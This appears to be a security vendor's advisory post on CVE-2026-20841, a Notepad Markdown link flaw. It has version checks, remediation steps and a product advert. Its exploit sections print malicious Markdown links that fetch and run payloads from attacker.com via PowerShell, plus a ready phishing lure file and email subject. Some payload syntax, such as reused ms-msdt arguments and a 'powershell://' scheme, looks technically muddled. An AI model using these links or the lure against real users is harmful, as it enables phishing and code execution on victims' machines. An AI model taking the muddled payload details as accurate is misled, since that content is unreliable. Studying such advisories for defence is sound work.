CVE-2026-20841: Windows Notepad RCE via Markdown
The new Markdown rendering in Windows Notepad has a critical flaw. A crafted .md file lets attackers execute code when you click a link.
TL;DR
- RCE in modern Windows Notepad (Microsoft Store version)
- Malicious Markdown links trigger command injection on click
- CVSS 8.8 — user interaction required but trivial to exploit
- Fix: update Notepad via Microsoft Store to version 11.2510+
What is CVE-2026-20841?
A remote code execution vulnerability in the modern Windows Notepad. The new Markdown rendering engine doesn't sanitize URI schemes in hyperlinks. Click a crafted link in a .md file and Notepad passes it straight to the system shell.
How It Works
Modern Notepad parses Markdown — bold, headers, and links. Attackers embed a link using a custom protocol scheme that points to a local script or command. Notepad doesn't validate the URI, passes it to the OS protocol handler, and the attacker's payload executes.
# Normal Markdown link:
[Click here](https://example.com)
# Malicious Markdown link — triggers command injection:
[Open Document](ms-msdt:/id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=h]$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Y2FsYy5leGU="))'))))i]")
# Or simpler — custom protocol to PowerShell:
[View Report](powershell://command=Invoke-WebRequest%20-Uri%20http://attacker.com/shell.exe%20-OutFile%20C:/temp/shell.exe;Start-Process%20C:/temp/shell.exe)
# What happens:
# 1. User opens malicious .md file in Notepad
# 2. Sees a normal-looking "View Report" link
# 3. Clicks it
# 4. Notepad sends URI to Windows protocol handler
# 5. PowerShell downloads and runs attacker's payloadAre You Vulnerable?
Check your Notepad version. If it's from the Microsoft Store and below 11.2510, you're exposed.
# Check Notepad version via PowerShell
Get-AppxPackage *Notepad* | Select-Object Name, Version
# If Version < 11.2510.0.0 → VULNERABLE
# If using legacy notepad (C:\Windows\System32\notepad.exe) → NOT affected
# Check if .md files open in modern Notepad by default
assoc .md
ftype *Notepad*
# Quick test: does your Notepad render Markdown?
# Create test.md with "# Hello" — if it shows as a heading, you have the vulnerable versionLegacy notepad.exe is NOT affected. Only the Microsoft Store version with Markdown support.
Exploit — Full Chain
Attacker sends a .md file via email. Victim opens it in Notepad, sees a professional-looking document, and clicks a link. Game over.
# 1. Create malicious Markdown file (attacker side)
cat > report.md << 'EOF'
# Q4 Security Audit Report
Status: **COMPLETE** | Classification: Internal
## Summary
All systems passed baseline security checks.
Click below to view the full interactive report.
[View Full Report](ms-msdt:/id PCWDiagnostic /skip force /param "IT_RBrowseForFile=$(IEX(IWR -Uri http://attacker.com/payload.ps1))")
---
*Generated by SecurityBot v4.2 | Do not forward*
EOF
# 2. Send via phishing email with subject:
# "Q4 Security Audit Results - Action Required"
# 3. Victim opens in Notepad, clicks "View Full Report"
# 4. PowerShell downloads and executes payload.ps1
# 5. Attacker has shell with victim's privilegesRemediation
Update immediately. Block if you can't update.
# Option 1: Update Notepad via Store (mandatory)
winget upgrade "Windows Notepad"
# Or: Microsoft Store → Library → Get Updates
# Option 2: Block modern Notepad via AppLocker (temporary)
# Create a deny rule for package: Microsoft.WindowsNotepad
# Option 3: Force .md files to open in legacy notepad
assoc .md=txtfile
ftype txtfile=C:\Windows\System32\notepad.exe %1
# Option 4: Group Policy — disable protocol handlers for Notepad
# Computer Config → Admin Templates → Windows ComponentsUpdate to version 11.2510+. If you can't, force .md files to open in legacy notepad.exe.
Scan with TEPTEZ. Find this before attackers do.
TEPTEZ scans your endpoints for vulnerable app versions, unpatched software, and exploitable configs. Check out our DAST AI — it scans, finds, and gives you the fix.
Try TEPTEZ Free